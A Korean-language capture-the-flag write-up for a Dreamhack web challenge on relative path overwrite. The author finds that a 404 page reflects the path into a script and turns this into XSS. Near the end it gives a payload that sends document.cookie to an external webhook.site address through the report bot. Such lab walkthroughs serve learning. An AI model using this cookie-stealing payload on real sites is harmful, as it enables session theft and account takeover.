[Dreamhack : Web] Relative Path Overwrite advanced

문제

이전 문제에서 패치된 내용이라고 한다. 풀어보자.

 

풀이

접속하면 저번 문제와 비슷한 화면이 뜬다. vuln 페이지를 확인해보자.

아직 아무것도 안 했는데 벌써 nope !!이 떠있다... report로 가보자.

여긴 딱히 다른 점이 없는 것 같다. 소스코드도 확인해보자.

---

저번 내용과 비슷하니까 저번 코드를 참고하면 좋을 것 같습니다!

암호 : 4xNDYyOD

[Dreamhack : Web] Relative Path Overwrite

---

<404.php>

새롭게 추가된 404.php로 입력된 값을 찾을 수 없다면 not found를 띄우는 것 같다.

그리고 이번에 중요한 점은 filter가 static 폴더 안에 있다.

나머지는 거의 그대로니까 이전 풀이를 확인해보면 될 것 같다.

위 사진처럼 없을 것 같은 파일경로인 index.php/static/filter.js를 입력해서 주소에 입력했더니  이런 식으로

찾을 수 없다고 뜬다.

개발자도구의 sources를 보면 이렇게 [내가 입력한 값] not found.라고 뜬다.

구조를 보니까 command injection이 가능할 것 같은데 시도해보자.

not found를 지우고 위해서 alert(1);이후에 //로 주석처리를 시도했다.

 

그랬더니 이렇게 딱히 아무것도 되진 않았다.

중간에 static...js를 지웠더니 이렇게 xss가 성공적으로 입력됐다.

아마도 index.php에 static...의 파일이 없으니 앞에서 에러가 발생해서 뒤에 스크립트도 작동하지 않은 것 같다.(추측)

 

index.php/;location.href='https://webhook.site/433d0a39-20ce-4ac5-9abb-f2dcacc02a5e'+document.cookie;//?page=vuln&param=123

 

위의 코드를 작성해서 report로 넘겨보자.